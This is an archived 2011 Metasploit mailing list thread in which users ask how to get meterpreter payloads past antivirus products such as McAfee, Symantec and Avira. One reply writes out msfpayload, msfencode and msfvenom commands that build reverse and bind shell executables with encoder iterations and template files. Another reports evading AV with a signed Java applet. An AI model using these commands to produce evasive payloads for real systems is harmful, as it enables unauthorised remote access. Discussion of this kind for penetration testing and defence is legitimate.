Metasploit mailing list archives
Re: Yet another AV bypassing question
From: Ozan UÇAR <mail () ozanucar com>
Date: Mon, 27 Jun 2011 12:08:20 +0300
Hi Everyone, I tested msfvenom and msfpayload with msfencode. I generated a reverse meterpreter windows executable file this following commands; # ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.200.49 LPORT=4443 R | ./msfencode -t exe -x /opt/framework-3.7.1/msf3/explorer.exe -o 1.exe # ./msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > 2.exe # ./msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -t explorer.exe -f exe > 3.exe But, avira antivir is dedected as "TR/Crypte.Epack.Gen2". Do you have any solitions. Thanks for suppors. 2011/6/27 Jason Hawks <jason.hawks0 () gmail com>
Hi everyone, Thank you very much for your answers. I wrote my own template and it did it. At least, I was able to use java_signed_applet + meterpreter and bypass McAfee and Symantec EP. I will try with other AV vendors as soon as I can. Cheers, Jason 2011/6/24 Jason Hawks <jason.hawks0 () gmail com>:Hello list, As many of you, I'm trying to bypass my AV but I'm not lucky with the metasploit encoders anymore. My Question is simple (but I don't know about the answer yet). Does modifying and recompiling meterpreter source code (with spread dummy instructions and a lot of try-and-error attempt) could help me ? or the main problem is not in meterpreter DLL but somewhere else ? Actually I got a try modifying the source code of meterpreter (using Visual Studio Express), but it didn't change anything. Therefore, I'm wondering if it's just a matter of tries or if I'm wasting my time. Am I looking in the right direction ? For information, I'm playing with McAfee 8.X right now. Thank you very much for your lights. Any other tips are welcome. Cheers, Jason_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Yet another AV bypassing question Jason Hawks (Jun 24)
- Re: Yet another AV bypassing question Average SecurityGuy (Jun 24)
- Re: Yet another AV bypassing question scriptjunkie (Jun 24)
- Re: Yet another AV bypassing question Jason Hawks (Jun 26)
- Re: Yet another AV bypassing question Ozan UÇAR (Jun 27)
- Re: Yet another AV bypassing question Average SecurityGuy (Jun 24)